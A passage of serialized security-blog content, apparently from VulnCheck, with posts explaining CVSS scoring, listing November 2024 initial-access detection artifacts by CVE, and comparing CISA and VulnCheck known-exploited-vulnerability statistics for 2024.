them.",[18,59142,59143,59146,59148],{},[295,59144,59145],{},"Proactive Security Measures",[1823,59147],{},"\nRegularly patch systems to prevent privilege escalation and enforce least-privilege policies to limit attackers’ access.",[61,59150,59152],{"id":59151},"summary-and-resources","Summary and Resources",[18,59154,59155],{},"Active C2 servers represent a dynamic and ongoing threat in the cybersecurity landscape. By understanding how they operate, the risks they pose, and the steps defenders can take to mitigate their impact, organizations can strengthen their posture against advanced attacks.",[18,59157,59158,59159,59],{},"For more in-depth cybersecurity insights, ",[47,59160,59163],{"href":59161,"rel":59162},"https:\u002F\u002Fdocs.vulncheck.com\u002Fkb\u002Fexploit-intelligence-101",[51],"visit VulnCheck’s Exploit Intelligence 101 Knowledge Base",[44317,59165],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":59167},[59168,59169,59170,59171,59172,59173],{"id":58934,"depth":220,"text":58935},{"id":58971,"depth":220,"text":58972},{"id":59017,"depth":220,"text":59018},{"id":59056,"depth":220,"text":59057},{"id":59112,"depth":220,"text":59113},{"id":59151,"depth":220,"text":59152},"2024-12-12","Exploit Intel 101 - Active C2 Servers",{"slug":59177},"active-c2-servers","\u002Fblog\u002Factive-c2-servers",{"title":58911,"description":59175},{"title":41489,"color":41490,"icon":41491},"blog\u002Factive-c2-servers",[41494],"IopKKSRGylnvBsCtgxFTBvKP8I1HIBPv5Chrn8beY_E",{"id":59185,"title":59186,"articles":7,"authors":59187,"body":59189,"date":59174,"description":59388,"extension":234,"image":7,"link":7,"meta":59389,"navigation":237,"path":59391,"seo":59392,"series":59393,"stem":59394,"subtype":7,"tags":59395,"__hash__":59396},"blog\u002Fblog\u002Fcommon-vulnerability-scoring-system.md","Common Vulnerability Scoring System (CVSS)",[59188],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":59190,"toc":59376},[59191,59193,59204,59208,59211,59214,59218,59221,59224,59244,59248,59251,59254,59257,59263,59266,59272,59276,59279,59282,59293,59297,59300,59306,59309,59313,59316,59319,59322,59326,59329,59335,59339,59342,59345,59348,59351,59355,59358,59361,59364,59366,59369,59374],[18,59192,44358],{},[22,59194,59195,59198,59201],{},[25,59196,59197],{},"The Common Vulnerability Scoring System (CVSS) is a widely used framework for assessing the severity of software vulnerabilities.",[25,59199,59200],{},"Why assigning a numerical score to vulnerabilities provides a standardized way for organizations to assess risk, prioritize remediation efforts, and communicate the severity of vulnerabilities effectively.",[25,59202,59203],{},"The essential components of CVSS, focusing on the most widely implemented version, CVSS 3.1, while exploring its benefits, limitations, and evolution.",[61,59205,59207],{"id":59206},"what-is-cvss","What Is CVSS?",[18,59209,59210],{},"With thousands of vulnerabilities disclosed annually, determining which to address first can be overwhelming. CVSS is one tool that organizations can use to help solve this problem by offering a consistent, objective framework to score vulnerabilities based on their potential impact and ease of exploitation, and other important factors.",[18,59212,59213],{},"Before CVSS, the lack of a standardized system often led to inconsistent assessments across vendors, security teams, and industries. CVSS ensures that vulnerabilities are evaluated using a common framework, making it easier to compare risks across systems.",[61,59215,59217],{"id":59216},"the-core-of-cvss-base-scores","The Core of CVSS: Base Scores",[18,59219,59220],{},"The Base Score is the cornerstone of the CVSS framework. It measures the intrinsic severity of a vulnerability, independent of temporal or environmental factors. The CVSS Base Score is calculated using a set of metrics that describe how the vulnerability can be exploited and its potential impact.",[18,59222,59223],{},"Key metrics of the CVSS Base Score include:",[22,59225,59226,59229,59232,59235,59238,59241],{},[25,59227,59228],{},"Attack Vector (AV): This metric describes how an attacker can exploit the vulnerability. A vulnerability exploitable remotely over a network scores higher than one requiring local access because the attack surface is broader, and offers greater exposure to threat actors.",[25,59230,59231],{},"Attack Complexity (AC): This captures the difficulty of successfully exploiting the vulnerability. If an exploit requires specific conditions or dependencies to be met, the complexity is high, resulting in a lower score.",[25,59233,59234],{},"Privileges Required (PR): This metric assesses whether an attacker needs elevated privileges to exploit the vulnerability. Vulnerabilities that can be exploited without any special permissions are scored higher.",[25,59236,59237],{},"User Interaction (UI): Exploits that require a user to take an action, such as clicking a link or opening a file, score lower than those that require no user interaction.",[25,59239,59240],{},"Scope (S): Scope measures whether the impact of exploitation is confined to the vulnerable component or extends beyond its security boundary. Vulnerabilities that can affect other systems or applications are scored higher.",[25,59242,59243],{},"Confidentiality (C), Integrity (I), and Availability (A): These metrics evaluate the impact of exploitation on data confidentiality, data integrity, and system availability, respectively. A vulnerability compromising all three dimensions scores higher.",[61,59245,59247],{"id":59246},"example-cvss-base-scores-and-vectors","Example CVSS Base Scores and Vectors",[18,59249,59250],{},"To generate a CVSS Base Score, these metrics are interpreted using a standardized algorithm in order to generate a score between 0.0 and 10.0, representing the inherent risk. This simple score can be used as a component in vulnerability prioritization.",[18,59252,59253],{},"That said, the individual metrics provide a good degree of context about a vulnerability, which is lost when the metrics are condensed to a simple score. In order to capture the deeper context behind the score, CVSS also defines a Vector String which incorporates all the metrics in a format that’s simple for humans and machines to interpret. Let’s look at a couple of examples.",[18,59255,59256],{},"For example, CVE-2024-9989 is an authentication bypass vulnerability in WordPress that makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, so long as they have access to the username. It can be exploited easily over the network without any special privileges or user interaction. This vulnerability has been assigned the following CVSS vector, which computes to a CVSS Base Score of 9.8:",[1354,59258,59261],{"className":59259,"code":59260,"language":1359,"meta":219},[1357],"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H\n",[886,59262,59260],{"__ignoreMap":219},[18,59264,59265],{},"Imagine that this vulnerability presented slightly differently, requiring the attacker to have access to an existing low-privilege user account, and requiring the attacker to perform a complicated cryptographic analysis in order to perform a successful exploit. These changes in Attack Complexity and Privileges Required result in a lower CVSS Base Score of 7.5, and modifications to the CVSS Vector:",[1354,59267,59270],{"className":59268,"code":59269,"language":1359,"meta":219},[1357],"CVSS:3.1\u002FAV:N\u002F**AC:H**\u002F**PR:L**\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H\n",[886,59271,59269],{"__ignoreMap":219},[61,59273,59275],{"id":59274},"temporal-scores-adding-context-over-time","Temporal Scores: Adding Context Over Time",[18,59277,59278],{},"While Base Scores represent the intrinsic characteristics of a vulnerability, they don’t account for changing factors such as exploit availability or remediation efforts. This is where the CVSS Temporal Score comes in. Temporal Scores adjust the CVSS Base Score to reflect the current state of a vulnerability.",[18,59280,59281],{},"Key metrics of the Temporal Score include:",[22,59283,59284,59287,59290],{},[25,59285,59286],{},"Exploit Code Maturity (E): This metric evaluates whether exploit code is available and how reliable it is. Vulnerabilities with publicly available, functional exploit code score higher, as it makes it simpler for lower-skilled attackers to leverage the vulnerability.",[25,59288,59289],{},"Remediation Level (RL): Remediation Level highlights the status of a fix, if any, for the vulnerability. When a vulnerability is first discovered, there will be no solution available. Over time, vendors may release temporary workarounds, and eventually a patch or other permanent fix. Vulnerabilities with official, permanent fixes are scored lower than vulnerabilities with less reliable fixes.",[25,59291,59292],{},"Report Confidence (RC): The reliability of the vulnerability report is also considered. Verified vulnerabilities score higher than those based on unconfirmed or speculative reports.",[61,59294,59296],{"id":59295},"example-temporal-scoring","Example Temporal Scoring",[18,59298,59299],{},"Returning to our CVE-2024-9989 example, once the vendor releases an official patch for the vulnerability, the Remediation Level is updated to reflect it, and the overall CVSS score (Base + Temporal) goes down from 9.8 to 9.4.",[1354,59301,59304],{"className":59302,"code":59303,"language":1359,"meta":219},[1357],"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H\u002F**RL:O**\n",[886,59305,59303],{"__ignoreMap":219},[18,59307,59308],{},"This dynamic adjustment helps organizations focus on the most pressing vulnerabilities as the situation evolves.",[61,59310,59312],{"id":59311},"environmental-metrics-customizing-for-your-environment","Environmental Metrics: Customizing for Your Environment",[18,59314,59315],{},"Every organization has unique systems, configurations, and priorities. The CVSS Environmental Score allows security teams to tailor the Base and Temporal Scores to their specific context. This customization ensures that vulnerabilities are assessed based on their actual impact on the organization’s environment.",[18,59317,59318],{},"Environmental metrics modify the Base Score by accounting for factors such as the criticality of the affected system or the sensitivity of the data it processes. For example, a vulnerability in a system storing sensitive customer information might receive a higher score in an organization with strict regulatory requirements.",[18,59320,59321],{},"Organizations may also modify the base metrics to reflect their own situation. This allows security teams to take into account their own local defensive countermeasures and other factors that might not be fully reflected in the Base Score metrics.",[61,59323,59325],{"id":59324},"example-environmental-scoring","Example Environmental Scoring",[18,59327,59328],{},"Returning to our CVE-2024-9989 once more, let’s consider a specific organization. Our example organization uses WordPress only internally for publishing the results from the weekly departmental bowling tournament. This data has low importance from the perspective of confidentiality, integrity, and availability. It’s also not accessible from the outside, but instead requires a user to have access to the local network. These circumstances significantly reduce the risk of damage from an exploit of CVE-2024-9989, and the CVSS score (Base + Environmental) is reduced from 9.8 down to 6.6, with the following CVSS vector:",[1354,59330,59333],{"className":59331,"code":59332,"language":1359,"meta":219},[1357],"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H\u002F**CR:L\u002FIR:L\u002FAR:L\u002FMAV:L**\n",[886,59334,59332],{"__ignoreMap":219},[61,59336,59338],{"id":59337},"limitations-of-cvss","Limitations of CVSS",[18,59340,59341],{},"While CVSS is a powerful tool to assist in vulnerability prioritization and risk management, it is not without its limitations. As seen above, there is a great deal of complexity hidden behind what many think of as a simple numerical score.",[18,59343,59344],{},"A CVSS Base Score is derived from 8 different metrics, each requiring accurate data and judgment. Incorporating temporal and environmental factors adds 14 additional metrics, which can change over time. Misinterpretations or inconsistent application of these metrics can lead to misleading scores. Few vulnerability management solutions provide the flexibility to routinely manage all this data across a large enterprise environment.",[18,59346,59347],{},"In addition, keeping abreast of temporal and environmental developments that affect CVSS scoring is a daunting challenge. New exploits are released every day, sometimes for vulnerabilities that were originally disclosed months or years in the past. Vendor disclosures and public vulnerability databases fall out-of-date rapidly. Effective prioritization requires a good stream of exploit intelligence and effective tools for ingesting and operationalizing it.",[18,59349,59350],{},"Finally, the existence of multiple versions of CVSS, with varying levels of adoption, further complicates matters. CVSS 3.1 is widely supported in most environments today, but some tools and vendors still use earlier versions, leading to inconsistencies in scoring and prioritization.",[61,59352,59354],{"id":59353},"the-evolution-of-cvss-a-look-at-40","The Evolution of CVSS: A Look at 4.0",[18,59356,59357],{},"CVSS 4.0 has also been released, and while it adds more nuance and context than previous versions, it also promises to introduce confusion as it is slowly adopted.",[18,59359,59360],{},"One of the most notable is support for vulnerability chaining, allowing for better representation of complex attack scenarios. Additionally, CVSS 4.0 refines metrics like Exploitability and introduces qualitative scoring (High, Medium, Low) as an alternative to numeric scores.",[18,59362,59363],{},"These updates aim to make CVSS more comprehensive while remaining practical for security teams. Although adoption of CVSS 4.0 will take time, it represents a step forward in addressing the evolving challenges of vulnerability management.",[61,59365,1903],{"id":1902},[18,59367,59368],{},"CVSS provides a standardized and consistent approach to assessing the severity of software vulnerabilities. The framework equips organizations with much of the context needed to prioritize their remediation efforts effectively. However, understanding its limitations is crucial to using it wisely. By supplementing CVSS scores with rich exploit intelligence and keeping abreast of its evolution, security professionals can better manage the complex landscape of vulnerabilities.",[18,59370,59158,59371,59],{},[47,59372,59163],{"href":59161,"rel":59373},[51],[44317,59375],{"to":13111},{"title":219,"searchDepth":220,"depth":220,"links":59377},[59378,59379,59380,59381,59382,59383,59384,59385,59386,59387],{"id":59206,"depth":220,"text":59207},{"id":59216,"depth":220,"text":59217},{"id":59246,"depth":220,"text":59247},{"id":59274,"depth":220,"text":59275},{"id":59295,"depth":220,"text":59296},{"id":59311,"depth":220,"text":59312},{"id":59324,"depth":220,"text":59325},{"id":59337,"depth":220,"text":59338},{"id":59353,"depth":220,"text":59354},{"id":1902,"depth":220,"text":1903},"Exploit Intel 101 - Common Vulnerability Scoring System (CVSS)",{"slug":59390},"common-vulnerability-scoring-system","\u002Fblog\u002Fcommon-vulnerability-scoring-system",{"title":59186,"description":59388},{"title":41489,"color":41490,"icon":41491},"blog\u002Fcommon-vulnerability-scoring-system",[41494],"F5pAOBD1l-YuWpziYnLYW8Tk-a3BOj-1vTuYgZ3y3Yc",{"id":59398,"title":59399,"articles":7,"authors":59400,"body":59402,"date":59866,"description":59867,"extension":234,"image":7,"link":7,"meta":59868,"navigation":237,"path":59870,"seo":59871,"series":7,"stem":59872,"subtype":7,"tags":59873,"__hash__":59874},"blog\u002Fblog\u002Finitial-access-intelligence-november-2024.md","Detecting Exploitation w\u002F VulnCheck Initial Access Intelligence - November 2024",[59401],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":59403,"toc":59859},[59404,59410,59413,59416,59420,59427,59431,59434,59459,59463,59827,59831,59842,59848,59852],[18,59405,59406],{},[68,59407],{":width":10862,"alt":59408,"src":59409},"Initial Access Intelligence - November 2024","\u002Fblog\u002Finitial-access-intelligence-november-2024\u002Finitial-access-november-2024.png",[18,59411,59412],{},"VulnCheck Initial Access Intelligence equips organizations and security teams with detection artifacts including Suricata signatures, YARA rules, PCAPs, and private exploit PoCs to defend against initial access vulnerabilities that are either already being exploited or likely to be exploited soon.",[18,59414,59415],{},"In November 2024, VulnCheck released Initial Access Intelligence (IAI) artifacts for 15 CVEs, covering 14 different vendors and products. 11 of the 14 have confirmed exploitation activity as of December 11th, 2024. The release of these detection artifacts include widely used edge devices from vendors including Palo Alto, Citrix, D-Link, Fortinet and Netgear.",[61,59417,59419],{"id":59418},"projectsend-exploitation-discovery","ProjectSend Exploitation Discovery",[18,59421,59422,59423],{},"In November we discovered public-facing ProjectSend instances that appeared to have been exploited by attackers. As of November 25th, 99% of ProjectSend instances remained vulnerable and have not upgraded to the patched version released in August. Public exploits have pre-dated CVE assignment by months, including Nuclei templates and a weaponized Metasploit module. So we issued a CVE and released our research and initial artifacts for the vulnerability. Learn more about the research in our ",[47,59424,59426],{"href":53833,"rel":59425},[51],"Project Send Blog Post",[61,59428,59430],{"id":59429},"initial-access-intelligence-november-breakdown","Initial Access Intelligence - November Breakdown",[18,59432,59433],{},"To provide better visibility into these updates, we’ve broken down November’s Initial Access Intelligence Artifacts by CVE. For each CVE, we provide a range of detection tools including:",[22,59435,59436,59438,59441,59444,59447,59450,59453,59456],{},[25,59437,325],{},[25,59439,59440],{},"Version scanners",[25,59442,59443],{},"PCAPs",[25,59445,59446],{},"Suricata rules",[25,59448,59449],{},"Snort rules",[25,59451,59452],{},"YARA rules",[25,59454,59455],{},"Greynoise\u002FCensys\u002FShodan\u002FFOFA\u002FZoomEye Queries",[25,59457,59458],{},"Target Docker Containers",[61,59460,59462],{"id":59461},"november-2024-initial-access-artifacts","November 2024 Initial Access Artifacts",[307,59464,59465,59495],{},[310,59466,59467],{},[313,59468,59469,59472,59475,59477,59480,59483,59486,59489,59492],{},[316,59470,59471],{},"Artifact Name",[316,59473,59474],{},"Date Added",[316,59476,242],{},[316,59478,59479],{},"Exploit",[316,59481,59482],{},"Version Scanner",[316,59484,59485],{},"pcap",[316,59487,59488],{},"Suricata Rule",[316,59490,59491],{},"Snort Rule",[316,59493,59494],{},"Yara",[336,59496,59497,59521,59543,59564,59585,59607,59629,59651,59673,59695,59717,59739,59761,59783,59805],{},[313,59498,59499,59502,59505,59508,59511,59513,59515,59517,59519],{},[341,59500,59501],{},"Derby SQL based RCE",[341,59503,59504],{},"2024-11",[341,59506,59507],{},"CVE-2021-29442",[341,59509,59510],{},"✅",[341,59512,59510],{},[341,59514,59510],{},[341,59516,59510],{},[341,59518,59510],{},[341,59520,59510],{},[313,59522,59523,59526,59528,59531,59533,59535,59537,59539,59541],{},[341,59524,59525],{},"ProjectSend Incorrect Authorization Webshell Upload",[341,59527,59504],{},[341,59529,59530],{},"CVE-2024-11680",[341,59532,59510],{},[341,59534,59510],{},[341,59536,59510],{},[341,59538,59510],{},[341,59540,59510],{},[341,59542,59510],{},[313,59544,59545,59548,59550,59552,59554,59556,59558,59560,59562],{},[341,59546,59547],{},"Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability",[341,59549,59504],{},[341,59551,40163],{},[341,59553,59510],{},[341,59555,59510],{},[341,59557,59510],{},[341,59559,59510],{},[341,59561,59510],{},[341,59563],{},[313,59565,59566,59569,59571,59573,59575,59577,59579,59581,59583],{},[341,59567,59568],{},"Palo Alto Networks PAN-OS Management Interface Command Injection Vulnerability",[341,59570,59504],{},[341,59572,40168],{},[341,59574,59510],{},[341,59576,59510],{},[341,59578,59510],{},[341,59580,59510],{},[341,59582,59510],{},[341,59584],{},[313,59586,59587,59590,59592,59595,59597,59599,59601,59603,59605],{},[341,59588,59589],{},"Citrix Session Recording (Virtual Apps and Desktops) .NET Deserialization",[341,59591,59504],{},[341,59593,59594],{},"CVE-2024-8069",[341,59596,59510],{},[341,59598],{},[341,59600,59510],{},[341,59602,59510],{},[341,59604,59510],{},[341,59606],{},[313,59608,59609,59612,59614,59617,59619,59621,59623,59625,59627],{},[341,59610,59611],{},"D-Link ShareCenter Command Injection",[341,59613,59504],{},[341,59615,59616],{},"CVE-2024-10914",[341,59618,59510],{},[341,59620,59510],{},[341,59622,59510],{},[341,59624,59510],{},[341,59626,59510],{},[341,59628],{},[313,59630,59631,59634,59636,59639,59641,59643,59645,59647,59649],{},[341,59632,59633],{},"Netgear WAX206",[341,59635,59504],{},[341,59637,59638],{},"CVE-2024-20017",[341,59640],{},[341,59642,59510],{},[341,59644],{},[341,59646],{},[341,59648],{},[341,59650],{},[313,59652,59653,59656,59658,59661,59663,59665,59667,59669,59671],{},[341,59654,59655],{},"pgAdmin OAuth2 Information Disclosure",[341,59657,59504],{},[341,59659,59660],{},"CVE-2024-9014",[341,59662,59510],{},[341,59664,59510],{},[341,59666,59510],{},[341,59668,59510],{},[341,59670,59510],{},[341,59672],{},[313,59674,59675,59678,59680,59683,59685,59687,59689,59691,59693],{},[341,59676,59677],{},"Fortinet FortiOS Out-of-Bound Write",[341,59679,59504],{},[341,59681,59682],{},"CVE-2024-21762",[341,59684],{},[341,59686],{},[341,59688,59510],{},[341,59690,59510],{},[341,59692,59510],{},[341,59694],{},[313,59696,59697,59700,59702,59705,59707,59709,59711,59713,59715],{},[341,59698,59699],{},"Versa Director Favicon Upload (authenticated)",[341,59701,59504],{},[341,59703,59704],{},"CVE-2024-39717",[341,59706],{},[341,59708],{},[341,59710],{},[341,59712],{},[341,59714],{},[341,59716],{},[313,59718,59719,59722,59724,59727,59729,59731,59733,59735,59737],{},[341,59720,59721],{},"Apache Solr Authentication Bypass",[341,59723,59504],{},[341,59725,59726],{},"CVE-2024-45216",[341,59728,59510],{},[341,59730,59510],{},[341,59732,59510],{},[341,59734,59510],{},[341,59736,59510],{},[341,59738],{},[313,59740,59741,59744,59746,59749,59751,59753,59755,59757,59759],{},[341,59742,59743],{},"Acronis Cyber Protect Unauthenticated RCE",[341,59745,59504],{},[341,59747,59748],{},"CVE-2022-3405",[341,59750,59510],{},[341,59752],{},[341,59754,59510],{},[341,59756,59510],{},[341,59758,59510],{},[341,59760],{},[313,59762,59763,59766,59768,59771,59773,59775,59777,59779,59781],{},[341,59764,59765],{},"CyberPanel OPTIONS Command Injection",[341,59767,59504],{},[341,59769,59770],{},"CVE-2024-51378",[341,59772,59510],{},[341,59774],{},[341,59776,59510],{},[341,59778,59510],{},[341,59780,59510],{},[341,59782],{},[313,59784,59785,59788,59790,59793,59795,59797,59799,59801,59803],{},[341,59786,59787],{},"Smart HMI WebIQ File Leak",[341,59789,59504],{},[341,59791,59792],{},"CVE-2024-8752",[341,59794,59510],{},[341,59796,59510],{},[341,59798,59510],{},[341,59800,59510],{},[341,59802,59510],{},[341,59804],{},[313,59806,59807,59810,59812,59815,59817,59819,59821,59823,59825],{},[341,59808,59809],{},"Delta Electronics InfraSuite Device Master Deserialization",[341,59811,59504],{},[341,59813,59814],{},"CVE-2023-47207",[341,59816,59510],{},[341,59818],{},[341,59820,59510],{},[341,59822,59510],{},[341,59824,59510],{},[341,59826],{},[61,59828,59830],{"id":59829},"go-exploit-framework","Go Exploit Framework",[18,59832,59833,59834,59838,59839],{},"In October, we expanded the capabilities of go-exploit to include a ",[47,59835,59837],{"href":58240,"rel":59836},[51],"new command and control feature called ShellTunnel"," which captures reverse shell traffic and routes it through an intermediary attacker-controlled server before reaching the main C2 server. ",[47,59840,58240],{"href":58240,"rel":59841},[51],[18,59843,59844,59845,59],{},"For those new to go-exploit, VulnCheck's exploit proof of concept (PoC) and version scanner code is written in the Go programming language. They are provided with a Dockerfile for ease of use. The exploits leverage an Open Source Software (OSS) shared library, which VulnCheck has authored and maintains, called ",[47,59846,20558],{"href":14297,"rel":59847},[51],[61,59849,59851],{"id":59850},"learn-more-about-vulncheck-initial-access-intelligence","Learn More About VulnCheck Initial Access Intelligence",[18,59853,59854,59855],{},"Learn more about how you can leverage Initial Access Intelligence detection artifacts to detect & respond to remote code execution (RCE) vulnerabilities here: ",[47,59856,59857],{"href":59857,"rel":59858},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Finitial-access-intelligence\u002Fintroduction",[51],{"title":219,"searchDepth":220,"depth":220,"links":59860},[59861,59862,59863,59864,59865],{"id":59418,"depth":220,"text":59419},{"id":59429,"depth":220,"text":59430},{"id":59461,"depth":220,"text":59462},{"id":59829,"depth":220,"text":59830},{"id":59850,"depth":220,"text":59851},"2024-12-11","In November 2024, VulnCheck developed new Initial Access Intelligence (IAI) artifacts for 15 CVEs, covering 14 different vendors and products.",{"slug":59869},"initial-access-intelligence-november-2024","\u002Fblog\u002Finitial-access-intelligence-november-2024",{"title":59399,"description":59867},"blog\u002Finitial-access-intelligence-november-2024",[1281],"TL0WDB5blMMrbUAo7MmyI5pmQ4SOWX-P4u0SZ-WuatA",{"id":59876,"title":59877,"articles":7,"authors":59878,"body":59880,"date":60086,"description":59888,"extension":234,"image":7,"link":7,"meta":60087,"navigation":237,"path":60089,"seo":60090,"series":7,"stem":60091,"subtype":7,"tags":60092,"__hash__":60093},"blog\u002Fblog\u002Fcomparing-kevs-jupyter.md","A Peek Into the Known Exploited Vulnerabilities of 2024",[59879],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":59881,"toc":60074},[59882,59884,59901,59904,59912,59915,59923,59927,59932,59935,59938,59941,59945,59948,59952,59957,59960,59963,59966,59970,59975,59978,59981,59984,59988,59997,60002,60005,60008,60012,60017,60020,60023,60026,60029,60033,60036,60039,60063,60065,60067,60069],[61,59883,20],{"id":3520},[22,59885,59886,59889,59892,59895,59898],{},[25,59887,59888],{},"VulnCheck now provides an automated approach to providing broader visibility into differences between VulnCheck KEV and CISA KEV through a Jupyter Notebook publicly available on GitHub.",[25,59890,59891],{},"During 2024 (year-to-date), VulnCheck KEV added 717 new known exploited vulnerabilities (average of 59.8\u002Fmonth) vs. 170 added to CISA KEV (average of 14.2\u002Fmonth).",[25,59893,59894],{},"During 2024 (year-to-date), VulnCheck KEV added 410 unique vendors with one or more KEV vs. 56 unique vendors in CISA KEV.",[25,59896,59897],{},"The top 10 vendors by number of exploited vulnerabilities in 2024 include Microsoft (55), Apache (18), Ivanti (17), Apple (16), D-Link (14), Oracle (14), Google (13), Cisco (11), Progress (11) and VMware (11).",[25,59899,59900],{},"The top 10 products with exploited vulnerabilities in 2024 include Microsoft Windows (30), Google Chrome \u002F Chromium (11), Apple IOS products (9), Apache OFBiz (6), Ivanti Connect Secure (6), Citrix Netscaler (6), Apple Safari (5), Cisco ASA \u002F FTD (5), QNAP QTS (5), and openSSL (5).",[18,59902,59903],{},"Video Walkthrough: VulnCheck KEV Jupyter Notebook",[59905,59906],"iframe",{"allow":59907,"allow-full-screen":10874,"frame-border":445,"height":59908,"referrer-policy":59909,"src":59910,"title":59911,"width":10862},"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share",400,"strict-origin-when-cross-origin","https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FrFBUMqFQ4as?si=bEtJfBuVWaRiosss","YouTube video player",[18,59913,59914],{},"Last month, we forewent our monthly update on known exploited vulnerabilities (KEVs) and put that work towards building an automated approach to reviewing KEV trends that is easy for anyone to copy, modify and use. Our goal is to provide broader visibility into differences between VulnCheck KEV and CISA KEV using a public Jupyter Notebook that is automatically updated on a daily basis.",[18,59916,59917,59918,59922],{},"The Jupyter Notebook is available on VulnCheck’s Github ",[47,59919,3054],{"href":59920,"rel":59921},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fjupyter-notebooks\u002Fblob\u002Fmain\u002Fvulncheck-kev\u002Fvulncheck-kev-dashboard.ipynb",[51]," to use and works with our free community edition if you want to build your own VulnCheck KEV dashboard.",[61,59924,59926],{"id":59925},"_2024-known-exploited-vulnerabilities-statistics-cisa-kev-vs-vulncheck-kev","2024 Known Exploited Vulnerabilities Statistics (CISA KEV vs. VulnCheck KEV)",[18,59928,59929],{},[68,59930],{":width":10862,"alt":58618,"src":59931},"\u002Fblog\u002Fcomparing-kevs-jupyter\u002Fkev-stats-2024.png",[18,59933,59934],{},"The first area we explored was the volume differences between VulnCheck KEV and CISA KEV. To visualize this, we created a top-level dashboard highlighting key statistics for 2024, including:\nThe total number of KEVs added. VunCheck KEV added 717 new known exploited vulnerabilities, while CISA KEV added 170.",[18,59936,59937],{},"The average number of KEVs added per month. VulnCheck averaged 59.8 KEVs per month, while CISA averaged 14.2 per month. The number of unique vendors with at least one KEV. There are 410 unique vendors that had 1 or more KEV added to VulnCheck, while CISA covered 56 vendors. The number of unique products represented. VulnCheck added KEVs with 1 or more KEV while CISA added 98.",[18,59939,59940],{},"This dashboard provides a clear comparison of vendor and product coverage between VulnCheck KEV and CISA KEV.",[61,59942,59944],{"id":59943},"exploring-cisa-kev-vulncheck-kev-by-vendor-product","Exploring CISA KEV & VulnCheck KEV by Vendor & Product",[18,59946,59947],{},"Given the significant disparity in the number of vendors and products between CISA KEV and VulnCheck KEV, we created an interactive explorer to help visualize and explore the data. To achieve this, we used an interactive treemap within a Jupyter notebook. To interact with these treemaps, simply download the Jupyter notebook and open it in a tool like VS Code.",[993,59949,59951],{"id":59950},"exploring-vulncheck-kev-vendors-products","Exploring VulnCheck KEV Vendors \u002F Products",[18,59953,59954],{},[68,59955],{":width":10862,"alt":58618,"src":59956},"\u002Fblog\u002Fcomparing-kevs-jupyter\u002Fvulncheck-kev-2024.png",[18,59958,59959],{},"Based on exploit intelligence first captured by VulnCheck in 2024, the top 10 vendors by number of exploited vulnerabilities include Microsoft (55), Apache (18), Ivanti (17), Apple (16), D-Link (14), Oracle (14), Google (13), Cisco (11), Progress (11) and VMware (11).",[18,59961,59962],{},"Based on exploit intelligence first captured by VulnCheck in 2024, the top 10 products by exploited vulnerabilities include Microsoft Windows (30), Google Chrome \u002F Chromium (11), Apple IOS products (9), Apache OFBiz (6), Ivanti Connect Secure (6), Citrix Netscaler (6), Apple Safari (5), Cisco ASA \u002F FTD (5), QNAP QTS (5), and openSSL (5).",[18,59964,59965],{},"This data highlights the persistent targeting by threat actors across various platforms, including operating systems, browsers, web services, and network edge devices. Notably, products such as Hiltron DVR, Netlify OpenMetadata, and Paytium were omitted from this list due to the issuance of multiple CVEs for similar vulnerabilities simultaneously or their relatively lower prevalence.",[993,59967,59969],{"id":59968},"exploring-cisa-kev-by-vendors-products","Exploring CISA KEV by Vendors \u002F Products",[18,59971,59972],{},[68,59973],{":width":10862,"alt":58618,"src":59974},"\u002Fblog\u002Fcomparing-kevs-jupyter\u002Fcisa-kev-2024.png",[18,59976,59977],{},"The top 10 vendors by number of vulnerabilities that CISA added to KEV in 2024 include Microsoft (34), Ivanti (11), Adobe (7), Apple (7), Android (6), CIsco (6) D-Link (6), Palo Alto Networks (6), Apache (5), and VMware (5).",[18,59979,59980],{},"The top 10 products added to CISA KEV include Microsoft Windows (22), Google Chrome\u002FChromium (9), Cisco ASA \u002F FTD (5), Apple IOS Products (5), Abode Flash Player (4), Android Pixel (4), VMware Vcenter (4), Linux Kernel (4)",[18,59982,59983],{},"Additionally, there’s a notable distinction in the vulnerabilities added to the CISA KEV list. Many, such as those in Adobe Flash, had exploitation evidence publicly available years prior. This underscores differences between newly exploited vulnerabilities and the re-emergence of previously known vulnerabilities, a topic I’ll explore later in this post.",[61,59985,59987],{"id":59986},"comparing-2024-kevs-added-to-cisa-kev-and-vulncheck-kev-by-day-month-and-year","Comparing 2024 KEVS added to CISA KEV and VulnCheck KEV by day, month and year",[18,59989,59990,59991,59996],{},"To understand the frequency at which Known Exploited Vulnerabilities (KEVs) were added throughout the year, we created a calendar chart inspired by Jerry Gamblin’s ",[47,59992,59995],{"href":59993,"rel":59994},"https:\u002F\u002Fcve.icu\u002FCVECalendar.html",[51],"cve.icu"," project. These visualizations highlight the additional patterns for KEVs across CISA KEV and VulnCheck KEV.",[18,59998,59999],{},[68,60000],{":width":10862,"alt":58618,"src":60001},"\u002Fblog\u002Fcomparing-kevs-jupyter\u002Fkev-calendar.png",[18,60003,60004],{},"Looking at VulnCheck KEV, we see a consistent amount of exploitation activity seen for the first time throughout the year, with some larger numbers highlighted in yellow. These tend to be quarterly industry reports disclosing a larger number of vulnerabilities with observed exploitation. The highest number of vulnerabilities with exploitation evidence being added to VulnCheck KEV in a single day was 55. It’s also interesting to see a lull during US holiday seasons like Thanksgiving. We're not sure if it's security researchers or threat actors that take a break. LOL",[18,60006,60007],{},"When we look at CISA KEV, the number of vulnerabilities added is much sparser and tends to group during the weekend days, specifically Monday - Thursday, with only 4 instances of a KEV being reported on Fridays. CISA has not issued a single KEV during the weekend this year.",[61,60009,60011],{"id":60010},"historical-exploitation-evidence-availability-before-cisa-kev-all-cisa-kevs","Historical 